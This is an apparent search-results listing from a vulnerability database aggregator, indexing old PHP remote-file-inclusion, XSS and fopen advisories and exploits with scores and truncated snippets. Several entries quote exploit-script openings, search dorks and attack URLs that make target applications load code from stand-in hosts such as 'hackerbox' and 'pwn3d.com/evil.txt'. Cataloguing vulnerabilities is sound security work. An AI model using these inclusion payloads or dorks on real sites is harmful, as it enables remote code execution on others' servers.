
141 matches found

Exploit DB
added 2006/05/23 12:0 a.m., 46 views

Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion

!/usr/bin/php -q -d shortopentag=on \r\n"; die...

7.4 AI score
Exploits: 0

Packet Storm
added 2006/04/14 12:0 a.m., 28 views

sphider_13_xpl_pl.txt

!/usr/bin/perl use IO::Socket; print "\r\nSphider works with registerglobals = On & allowurlfopen = On\r\n"; print "by rgod rgodautisticiorg\r\n"; print "site: http://retrogod.altervista.org\r\n"; print "\r\ndork: "powered by sphider"\r\n"; sub main::urlEncode my $string = @; $string = s/\W/"%"...

7.4 AI score
Exploits: 0

seebug.org
added 2006/04/13 12:0 a.m., 40 views

vBulletin ImpEx <= 1.74 Remote Command Execution Exploit

No description provided by source. ?php / vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, subterrain, My gf url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/impex/ImpExData.php?systempath= hurl:http://www.pwn3d.com/evil.txt? / $cm...

7.1 AI score
Exploits: 0

exploitpack
added 2006/04/12 12:0 a.m., 17 views

Sphider 1.3 - configset.php Remote File Inclusion

Sphider 1.3 - configset.php Remote File Inclusion !/usr/bin/perl use IO::Socket; print "\r\nSphider works with registerglobals = On & allowurlfopen = On\r\n"; print "by rgod rgodautisticiorg\r\n"; print "site: http://retrogod.altervista.org\r\n"; print "\r\ndork: "powered by sphider"\r\n"; sub...

Exploits: 0

Prion
added 2006/03/30 12:6 a.m., 26 views

Cross site scripting

Multiple cross-site scripting (XSS) vulnerabilities in index.php in ViHor Design allow remote attackers to inject arbitrary web script or HTML via (1) a remote URL in the page parameter, which is processed by an fopen call, or (2) HTML or script in the page parameter, which is returned to the client in...

4.3 CVSS, 6.1 AI score, 0.00674 EPSS
Exploits: 1, References: 6

NVD
added 2006/03/30 12:6 a.m., 8 views

CVE-2006-1496

Multiple cross-site scripting (XSS) vulnerabilities in index.php in ViHor Design allow remote attackers to inject arbitrary web script or HTML via (1) a remote URL in the page parameter, which is processed by an fopen call, or (2) HTML or script in the page parameter, which is returned to the client in...

4.3 CVSS, 5.8 AI score, 0.00674 EPSS
Exploits: 1, References: 6

Packet Storm
added 2006/02/26 12:0 a.m., 17 views

igenus_remote.txt

!/usr/bin/perl use IO::Socket; print "\r\n"; print "iGENUS WebMail works against PHP5 with registerglobals = On\r\n"; print " & allowurlfopen = On\r\n"; print "by rgod rgodautisticiorg\r\n"; print "site: http://retrogod.altervista.org\r\n\r\n"; print "dork: intitle:"igenus webmail login"\r\n";...

7.4 AI score
Exploits: 0

seebug.org
added 2006/02/25 12:0 a.m., 35 views

iGENUS WebMail <= 2.0.2 (config_inc.php) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl use IO::Socket; print "\r\n"; print "iGENUS WebMail = 2.0.2 remote commads xctn\r\n"; print "- works against PHP5 with registerglobals = On\r\n"; print " & allowurlfopen = On\r\n"; print "by rgod rgodATautisticiDOTorg\r\n"; print "site:...

7.1 AI score
Exploits: 0

securityvulns
added 2005/09/28 12:0 a.m., 39 views

[SA16971] PHP Trailing Slash "open_basedir" Security Bypass

TITLE: PHP Trailing Slash "open_basedir" Security Bypass SECUNIA ADVISORY ID: SA16971 VERIFY ADVISORY: http://secunia.com/advisories/16971/ CRITICAL: Not critical IMPACT: Security Bypass WHERE: Local system SOFTWARE: PHP 4.4.x http://secunia.com/product/5768/ PHP 5.0.x...

0.8 AI score
Exploits: 0

CVE
added 2005/09/26 4:0 a.m., 63 views

CVE-2005-3054

PHP fopen_wrappers.c vulnerability (CVE-2005-3054) affects PHP 4.4.0 and possibly other versions, where open_basedir with a trailing slash can fail to restrict access to directories whose names are substrings of the target path. This enables PHP scripts in one directory to access files in other d...

2.1 CVSS, 6.3 AI score, 0.00443 EPSS
Exploits: 0, References: 13, Affected Software: 1

Tenable Nessus
added 2005/04/11 12:0 a.m., 51 views

ModernBill <= 4.3.0 Multiple Vulnerabilities

The version of ModernBill installed on the remote host is subject to multiple vulnerabilities : - A Remote File Include Vulnerability The application fails to sanitize the parameter 'DIR' before using it in the script 'news.php'. An attacker can exploit this flaw to browse or execute arbitrary...

7.5 CVSS, 6.1 AI score, 0.02408 EPSS
Exploits: 2, References: 5

exploitpack
added 2005/03/07 12:0 a.m., 13 views

phpWebLog 0.5.3 - Arbitrary File Inclusion

phpWebLog 0.5.3 - Arbitrary File Inclusion Example: if register_globals=on and allow_url_fopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

1.2 AI score
Exploits: 0

exploitpack
added 2005/03/07 12:0 a.m., 12 views

PHP mcNews 1.3 - skinfile Remote File Inclusion

PHP mcNews 1.3 - skinfile Remote File Inclusion Example: if register_globals=on and allow_url_fopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...

0.9 AI score
Exploits: 0

Exploit DB
added 2005/03/07 12:0 a.m., 33 views

PHP mcNews 1.3 - 'skinfile' Remote File Inclusion

Example: if register_globals=on and allow_url_fopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...

7 AI score
Exploits: 0

exploitpack
added 2005/03/05 12:0 a.m., 12 views

PHP Form Mail 2.3 - Arbitrary File Inclusion

PHP Form Mail 2.3 - Arbitrary File Inclusion Example: if register_globals=on and allow_url_fopen=on: http://victim/dir/inc/formmail.inc.php?scriptroot=http://hackerbox/ milw0rm.com 2005-03-05...

1 AI score
Exploits: 0

Cvelist
added 2003/03/18 5:0 a.m., 16 views

CVE-2002-1466

CafeLog b2 Weblog Tool 2.06pre4, with allowfopenurl enabled, allows remote attackers to execute arbitrary PHP code via the b2inc variable...

7.5 AI score, 0.01185 EPSS
Exploits: 1, References: 2

Packet Storm
added 2002/09/11 12:0 a.m., 39 views

phpcrlf.txt

PHP fopen CRLF Injection PROGRAM: PHP VENDOR: The PHP Group HOMEPAGE: http://www.php.net/ VULNERABLE VERSIONS: 4.1.2, 4.2.2, 4.2.3, latest CVS, possibly others IMMUNE VERSIONS: none, but workarounds exist SEVERITY: medium DESCRIPTION: "PHP is a widely-used Open Source general-purpose scripting...

7.4 AI score
Exploits: 0

exploitpack
added 2002/08/16 12:0 a.m., 18 views

SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing

SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing source: https://www.securityfocus.com/bid/5487/info fam is a freely available, open source file alteration monitor. It is maintained and distributed by SGI, and will work on the Linux and Unix operating systems. It is possible for a...

0.4 AI score
Exploits: 0

securityvulns
added 2002/08/03 12:0 a.m., 40 views

code injection in gallery

Hi! Code injection in gallery ------------------------------------- What is gallery? The Gallery is actually the best web gallery application around in the world. I'm using it too ;-. Go to http://gallery.sf.net/ to get further information and download this very cool app. remote include problems...

7.5 AI score
Exploits: 0

Packet Storm
added 2000/11/17 12:0 a.m., 39 views

vixie-cron.sh

Attached shell-script exploits fopen + preserved umask vulnerability in Paul Vixie's cron code. It will work on systems where /var/spool/cron is user-readable eg. 0755 - AFAIR Debian does so. RedHat at least 6.1 and previous have mode 0700 on /var/spool/cron, and thus it isn't exploitable in its...

7.4 AI score
Exploits: 0